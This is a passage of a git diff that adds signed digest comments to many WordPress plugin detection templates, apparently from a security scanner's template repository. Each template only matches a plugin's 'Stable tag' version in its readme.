4a0a004730450221009ff080f049a61dc1088f01f8bddb3b5b128416f6fa93e4eae5fdb7e7e3d08b4302207d008f200f13bc64bdcea90b47463b40c09d2bcb54f3978f4f970f1ebb321320:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..05707b05ea 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220215ba25ba27a8fe786e915ea597abbb6ca9c3bda25e445bfa967363f392dff75022100adb63c2c0e78200bcce5b060d6476442cc08bd044ca08e7aac7b8a025a4f7cfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..a122dbb0e6 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e11cacd0c80b0f9c5c7bb6c133b6fd023e37f6ab962ba57ff6c792e09fabcef802210094cb89b2197ff5c0320f1ccb0c3c25b8baa475d7a538a78f35ea15e49ca7dbb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..b624ab21ea 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e8368013484aa8de4f7a9acbffc58e5f41e07e77ccfa9b4da60185bc024c85560220538182cb36146e5b448a9b7898e16c57c5d72f89d6f62f246b86b6f5789097e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..aa09a912b1 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022018383f13c220fc85f7a60921f4e4f2b3fcf666c06e79b926e723311a0948996d022062452012d87906adac4df602e02411f7f884e999e3bcd0e153fb83be6c37c05c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..6ea71d04c4 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220071a37893119d0aef75704eb2651c19ba233e6b47c1618342f25f93a8f9e5c98022100a63bbd967db79cc5cc42ca66a830c32dffd5823d96f5447efc4e272c9765421d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..aefd6883cc 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ad7b9de4639177a7f4d81b27f1c4be2e02dcc3feeec3d88026dcf9a2597dcada022100db49ee2d3ba518276084d373e0a0eeb26d029e3172430adb00829ca8629c60ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..8fbc2e67ed 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200e39aae7e43a5554b0b462c4b2c3ade39686d8691a19084d74bf3589eae7cb1a02205f2a431062e49ca6a69a60af744e9886ccc673b4d8a17469aa33dc99d45f04a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..649aaf1b52 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008f21831e9564308bce837c83c797d8dfd30f6572683b1378d8fba96ed5366fde022039b043a5ab7bdca7dcb203d61f144bf54ccc5b0b4a42bc628a2cf97d583e1cff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..fa145f4a35 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e5c6f51ee0b59c2118589ca3f351def7abf0d0057396576b9986c8da374f4c50022100bd4a97a6eb0b4744a7fa221285f0cb494c88978158f76058a9a1520a4acb1d5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..edbc95a869 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220147aaa4b40315d8674f540f2fe6a8346eaf19e86a054b062ba9eb50db758fa70022100a6f71da94c9da96e5860d5236b74f2e3a562135fae94eedce38264c346722be1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..471452997d 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022073595c8b1756368a8df9237ce4b6efca6391cff8131ee92a1b5d85f2fc227104022100c2eb08a28267774c42de2d63ec7427fb4750bb9ac29edb21218d9ad3ff1c07f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..511621fd83 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d28cf1310a25c9556aa04776e581df35d39a680aa6546c25a71a16d9a2d9d26702206dd7984641f89ceba01cb98dab6ff5e1bb1ddba17385c7e0a2be392883f4c59d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..d35202cca0 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ff0a9f808afd5efbf8c6df6f09903baadad192f7e79bee88fe6bf899ad30c894022061d86088db8fdcb05e222424b68779e4e35261d78dd85f326586c3003c0ea80a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..d69cbce8e2 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210084744039f57576b62e00cd3ff262bd0f6d5e1dd19f82ab54f091308a3f75b53902210094b13e6b3c0f9aaca8f69d46e08878168b6a71126387055bab87c8185829ea06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..7fe853ea9b 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ceff873de4caed7029b6ca13609b1711a75f333cd935cc7b1a19beaed1ac15ef02210086679e3ad390857892a459385e22d3f908bd5f3344a074b1caec33d11ab3ed8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..eea02824e4 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a28db66a0ab2a6eeafed6e0c5a8c92aecfb5a34296f85b26cc60b05ce68829040221008e9f8600492e77cd8320d5f88420a8858b49974d32e8cd7bb6ad61db70f9fb05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..a25b851a47 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201dd0b669bf3de02c22037d9d60d9bf84bbf532a4b3d960360a99de7dda934d5502203c1683a67ca25c4bfe86647c93d7998f2b1054fdd758cf77dd5c5213df25d0db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..74c3bd4152 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022079caa917179bb5a86d3918b438c0b3feeca0c3f5a3900e5e8da1c060ee278f0f02207c62510b7c323103afb35008e43bc56f4d4ebd87e1c304eec0785dd9c7c86c2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..206aec38a9 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200dd1342a1d40f3bcdec8a288573df80e60f53c6120bb6ca746039a26253d54ae02206e7636d5c5692e3f9de410990d000c4df9c2393da5312985e32c87e8480faf7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..369422b94a 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220262a1485b7d7711c871419d6bc05e80f0d0898fb22a3b4920c6459e1b514ae5002202b92abdd79a3fe02edd79e7a538719cba5814feb7698daffd879dae410915494:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..1ff9aafaa0 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e85b365fbd3be0c5ce49f5d892f1cdaac406aca0785547ff80ffd075a02875a6022032d75202febfdeec9f9c0cf400574ac07150e1d160cfb2e1936fc29b841ae2c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..8a623384f5 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022049484274f7038d33e7ddac05e0e873a32c1fed4ce51bf8a9f93f7860cc6cf69e02205e7d90c4711961dc6c6c5a4ac05e0dcbe491e562f218d698778dc1f33f398eb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..727134539a 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c296a3c2f8f2f3678ae65ce81e1d17ae07a0b1e38a157e7cb309d8dd05ee6820022100ef4c765d82f4cd8926c50b5179037df06b2d9fc27b8257a39085a96e1904b279:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..668827909a 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f2f80a2985aae02a03fa37bcf7881952f45dc9a8f04236a3e28705e84981bc1e02201cd72b75c1367a2e0a892955a85e2cd62748240e6d7313d8346cc95875f8f5d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..765df2e602 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203495d2521a966e616f194b5730b732b1cf5fbcf0a60ea0cd653b79a82898acf402205111a56192cc2bdf060cb0d95033a77da69d7695d94d60e8d689d4fdeeb1ce29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..0db9e7c1c0 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203d6e2d2782cb2f5ded9302a825365893a34fa1037e0b79266855401418e7505d022100f3227319276454b635d099b50ce6de0785d5a427ddd96b01af7daa3ec9a85dd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..18344fd118 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ece4a5053faf7ba6b3cf99d35d5a56169a168338e052b427ca38c335e5dec12f022100e45894615077ce4ba81434cc05c9a432e4ea185571bd9829691b99224702ec73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..50b6e43734 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210082bfb7dd7836191908f230b9c10f9d870a34f6fa8e900438cd56dc6ac43ba334022100955361f24cc19ed73826525eb815bdb846a55116aa9b0261a9150d1f3d3852ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..eb02e0dff9 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206a5104b7f187af43dadf341d3db79ae060255b8e8bfa03ac7cc338349b32b48f022100b750700b5c975c83dc2e0e032d624726757b50b1d8a4be33f66e7b99c46fa00f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..d8f9c9d163 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eecb59c000ff020a0ef53e69b612314c281d1bfe85f325ec67a3e756072b802e022007bbf5c7cc14d3327463fe0b2ebe3f7c8796c37f95bdd1c8aa99e1d5c1bc4e31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..1222130927 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f7f89135e60eac1270645f5288dbb772c13bb9b3501d4b5b2749190a0e7f7e5202206c2956e5bbcea69bdeeb6fc1c41130fdd9d1e4d533dbf66d57016c5dbaf40a4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..a13c498c04 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bbcb4f43d189b6dbbb036289568c355f9498fa0e03852068137761242aaef9cb022100ffbfc18edcb3fb98c50255f03808cf20e19996ad1946b300790507e520688bbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..f1beed7336 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bfc96521387a0e588d4a70f6a6d8a1ec373d0bd1a9e29033c8838ea3d2f8ce9e022100f599cc9f6606062ed9299c22480b789f9845dc9e3c39a3bdf05e5ff7f8f1e80c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..189e85719b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220603220421ad38fd9c3004512c4d726dc30bbd22c2c93cc452c030fdd0edc13b102205e4dee9366722c18ba241380fdff55a7b1a012a3863061210f0eb593efe8421e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..a690f0302d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205a96e3564f670a4e4fcd55835dbd97a000edfc071b0f247d7f5e61bb533337d10221008638fac951456839c78aae803dc42c6ac63b80c3edb636fe9135061da15b5a9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..f00d91f95d 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dd72c10c9641f372ebdfdf42a3895f952b0828fc8fc22c71564947b0ea8de60d0220160174e601c38dd56123193875cace33e410fa7b2161f2fd4ea37d00daa7967b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..e6b7460a92 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a0ffaf26f11276014ae5aa310f28a37142cec3a2c5d718696ff25e47c0782a7f02203797a879192beac15295c3541a01d5f1669c770b792fc1355cb49df5eb753308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..7548e37570 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a80b0fff458d513b77d15f2757ce453d9f5300c856fef5e8c25ca785728ea731022100c73ae174e031b786dc7fbb77d50db6c547d828a8f8c84b6c867d760e13876c59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..5ef05a9750 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022006a3a2aa538d05523fb14a7d91c8e904ef63d50276165770fc740f4727b26ea0022100c5a123ab5d243e8136d499024019857cbfed767b1c7e911e228c640729af3ed1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..95fd0a3006 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022062211a5b843dddbfbb2ec0075a9ec80b514ea53d8d2d80098bab8eb3487e2764022058bc120d68ab99ae7cdb7000c466d979020ad5c5e903609debc43aa43c343f22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..71d6f618f8 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b373644e286d087ad2de9fab6e023fd53512f6a157fe765405e177d951cda5ab022036a598676d1ffb1b1dff750dc063adca6f1e75132eda987f2cc5fe34c99d9461:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..9eae2e7ee2 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205e539b0f3073b83c7215602f553387ffe19baa2dbb83de413c22fdf3383e2b060221008c56492b13ee9b790a89a5d331f1c245682b09cf9f6cf568f791a2b0ecfc9905:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..05419dcc82 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207f194a0088ece5e90f2db9886ec99a81405ab78f13c5fede36c242afb7970136022100a75da671ebe6a6ea6d6c7b5a6aa63e1886ec44227e239ae18e6743902d46a299:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..6bf38e9d25 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f4db0ba01ad638b3b94594698d727d7cbb5ce8598958dc3f2ce9ef3dba3523a8022100dfe922b010162ed28b7510c7d9ee19e110fa6922e7dadfb9df977316e520a2f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..5c44d9c9a2 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009c6cdaa6115e3b6a921dd5539423236574c870c23f2a90fe579aef1a7e2c79280220616e76d843ec42132c4766526f9a2fdcc67ca33feae10fcb249a13d820ae884f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..2f552eb16d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022079a2b08b88c3396bb62376494e41cc23088ae2ab3f3f5bc2b6b45bb59580bf96022001e95c37325bfb12872bc8031a44b12b0955e6df5a09c3c1d58255de4b72948f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..34a8cc7404 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 